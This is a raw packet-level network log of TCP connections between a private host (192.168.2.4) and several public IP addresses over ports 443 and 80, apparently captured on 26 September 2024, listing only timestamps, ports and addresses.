Sep 26, 2024 22:57:03.786555052 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.786639929 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.786735058 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.786935091 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.786963940 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.786981106 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.786988020 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.790950060 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:03.791049004 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:03.791140079 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:03.791426897 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:03.791456938 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:03.932013035 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:03.932208061 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:03.932703972 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:03.932718039 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:03.932898998 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:03.932904005 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.310506105 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.310612917 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.311791897 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.311820030 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.312036991 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.313162088 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.313201904 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.313242912 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.512140036 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.512206078 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.512237072 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.512267113 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.512283087 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.512312889 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.749778032 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.749804974 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.749921083 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.750193119 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.750262976 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.750802994 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.750890017 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.756531954 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.756619930 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.756680012 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.756855011 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.756882906 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.756899118 CEST	49769	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:04.756906986 CEST	443	49769	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:04.782138109 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:04.782190084 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:04.782272100 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:04.782572985 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:04.782584906 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:04.791235924 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.791320086 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.988512993 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.988604069 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.988646984 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.988711119 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.989227057 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.989296913 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.990031004 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.990098953 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.991601944 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.991667032 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:04.991838932 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:04.991900921 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.029548883 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.029661894 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.033979893 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.034092903 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.226144075 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.226304054 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.226433039 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.226491928 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.226799011 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.226850986 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.227174044 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.227222919 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.227792978 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.227844954 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.228180885 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.228225946 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.228853941 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.228907108 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.229662895 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.229715109 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.229850054 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.229899883 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.230690956 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.230742931 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.230950117 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.230998993 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.231703043 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.231754065 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.243022919 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.243103981 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.254982948 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.255017996 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.255247116 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.267810106 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.267898083 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.267960072 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.268023014 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.270852089 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.271831036 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.271892071 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.274822950 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.274846077 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.312701941 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.312800884 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.312901974 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.312961102 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.464802027 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.464868069 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.464909077 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.464952946 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.464976072 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.464999914 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.465202093 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.465264082 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.465406895 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.465454102 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.465759039 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.465811014 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.465977907 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.466026068 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.466345072 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.466391087 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.466583967 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.466634989 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.470405102 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.470482111 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.470684052 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.470743895 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.470941067 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.470990896 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.471270084 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.471396923 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.471688032 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.471919060 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.472249985 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.474642992 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.474674940 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.474709988 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.474761009 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.551136971 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.551213026 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.551350117 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.551407099 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.551568031 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.551656008 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.551852942 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.551924944 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.552117109 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.552179098 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.552205086 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.552256107 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.552278042 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.552313089 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.552335024 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.552364111 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.561031103 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.561073065 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:05.561098099 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.561137915 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:05.687927961 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.688024044 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.688088894 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.694850922 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.694881916 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.694909096 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.694924116 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.717137098 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:05.717185020 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:05.717262983 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:05.718130112 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:05.718147993 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:05.726327896 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.726403952 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:05.726481915 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.726834059 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:05.726865053 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.195039988 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.195111036 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.197360039 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.197376966 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.197591066 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.198829889 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.198892117 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.198920012 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.382071018 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:06.382162094 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:06.395052910 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:06.395062923 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:06.397277117 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:06.397284031 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:06.626485109 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.626595020 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.626667976 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.627290964 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.627338886 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.627376080 CEST	49772	443	192.168.2.4	188.114.96.3
Sep 26, 2024 22:57:06.627409935 CEST	443	49772	188.114.96.3	192.168.2.4
Sep 26, 2024 22:57:06.645783901 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:06.645849943 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:06.645910978 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:06.646452904 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:06.646467924 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.110023022 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.110097885 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.112170935 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.112179995 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.112390041 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.113790989 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.113807917 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.113846064 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.307846069 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.307945013 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.308012009 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.308223009 CEST	49771	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.308237076 CEST	443	49771	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.309787035 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.309883118 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.310364962 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.310650110 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.310686111 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.548527956 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.548593998 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.548670053 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.548949003 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.548962116 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.548971891 CEST	49773	443	192.168.2.4	104.21.58.182
Sep 26, 2024 22:57:07.548976898 CEST	443	49773	104.21.58.182	192.168.2.4
Sep 26, 2024 22:57:07.567909956 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:07.567996979 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:07.568113089 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:07.568550110 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:07.568582058 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:07.983587980 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.984312057 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.984817982 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.984844923 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:07.987035036 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:07.987046957 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:08.055306911 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.055401087 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.057099104 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.057132006 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.057363033 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.058691978 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.058731079 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.058765888 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.492440939 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.492685080 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.492769957 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.492929935 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.492985010 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.493024111 CEST	49775	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.493040085 CEST	443	49775	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.513273954 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.513355970 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.513442039 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.513793945 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:08.513823986 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:08.721138000 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:08.721235037 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:08.721270084 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:08.721343040 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:08.721415997 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:08.721556902 CEST	49774	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:08.721587896 CEST	443	49774	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:08.744257927 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:08.749119043 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.749241114 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:08.749386072 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:08.749386072 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:08.754410028 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.754453897 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.754502058 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.754528046 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.754571915 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.754601955 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:08.999946117 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.000036001 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.002079964 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.002113104 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.002379894 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.004060030 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.004060030 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.004151106 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.475956917 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.476036072 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.476118088 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.476397038 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.476440907 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.476468086 CEST	49776	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:09.476483107 CEST	443	49776	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:09.489940882 CEST	80	49777	45.132.206.251	192.168.2.4
Sep 26, 2024 22:57:09.490052938 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:09.521095991 CEST	49778	443	192.168.2.4	104.21.77.130
Sep 26, 2024 22:57:09.521157026 CEST	443	49778	104.21.77.130	192.168.2.4
Sep 26, 2024 22:57:09.521244049 CEST	49778	443	192.168.2.4	104.21.77.130
Sep 26, 2024 22:57:09.522154093 CEST	49778	443	192.168.2.4	104.21.77.130
Sep 26, 2024 22:57:09.522181034 CEST	443	49778	104.21.77.130	192.168.2.4
Sep 26, 2024 22:57:09.634095907 CEST	49778	443	192.168.2.4	104.21.77.130
Sep 26, 2024 22:57:09.665416002 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:09.665451050 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:09.665597916 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:09.666521072 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:09.666534901 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.319789886 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.319876909 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.321538925 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.321549892 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.321755886 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.323390007 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.371393919 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.821521044 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.821549892 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.821573973 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.821590900 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.821607113 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.821629047 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.821629047 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.822640896 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.906821966 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.906909943 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.906996965 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.907015085 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.907670021 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.918421984 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.918486118 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:10.918514013 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.918519974 CEST	443	49779	23.197.127.21	192.168.2.4
